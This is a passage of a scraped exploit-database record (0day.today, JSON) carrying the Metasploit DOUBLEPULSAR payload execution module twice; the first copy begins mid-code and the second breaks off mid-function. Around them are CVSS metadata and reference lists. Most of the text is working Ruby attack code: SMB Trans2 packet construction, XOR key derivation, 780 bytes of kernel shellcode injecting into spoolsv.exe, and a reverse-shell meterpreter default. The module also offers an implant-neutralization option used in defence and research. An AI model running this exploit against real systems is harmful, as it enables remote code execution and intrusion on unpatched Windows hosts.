fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack(\"S<\")\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" +\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" +\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" +\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" +\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" +\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" +\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" +\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" +\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" +\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" +\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" +\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" +\r\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" +\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" +\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" +\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" +\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" +\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" +\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" +\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" +\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" +\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" +\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" +\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" +\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" +\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" +\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" +\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" +\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" +\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" +\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" +\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" +\r\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" +\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" +\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" +\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" +\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" +\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" +\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" +\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" +\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" +\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" +\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" +\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" +\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" +\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" +\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" +\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-09-16] #"}, "lastseen": "2021-09-15T22:29:31", "differentElements": ["sourceData"], "edition": 18}, {"bulletin": {"id": "1337DAY-ID-33313", "vendorId": null, "hash": "f1b373011c7d5d5a7e070432a973ca07", "type": "zdt", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR - Payload Execution and Neutralization Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2019-10-04T00:00:00", "modified": "2019-10-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33313", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0147", "CVE-2017-0145", "CVE-2017-0144", "CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-16T22:32:51", "history": [], "viewCount": 93, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "nessus", "idList": ["700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM", "MS17-010.NASL"]}, {"type": "exploitdb", "idList": ["EDB-ID:43970", "EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-27786", "1337DAY-ID-33895", "1337DAY-ID-27802", "1337DAY-ID-27752"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142602", "PACKETSTORM:142603", "PACKETSTORM:142181"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0148", "CVE-2017-0145", "CVE-2017-0144", "CVE-2017-0147", "CVE-2017-0143", "CVE-2017-0146"]}, {"type": "symantec", "idList": ["SMNTC-96703", "SMNTC-96705", "SMNTC-96707", "SMNTC-96706", "SMNTC-96704", "SMNTC-96709"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "threatpost", "idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0145", "MS:CVE-2017-0143"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC", "MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34"]}], "modified": "2021-09-16T22:32:51", "rev": 2}, "score": {"value": 7.7, "vector": "NONE", "modified": "2021-09-16T22:32:51", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33313", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload', {}],\r\n ['Neutralize implant', {}]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n },\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack('V').first\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n vprint_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n vprint_good(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n vprint_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n vprint_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n pkt['Payload'].v['Payload'] = data\r\n\r\n 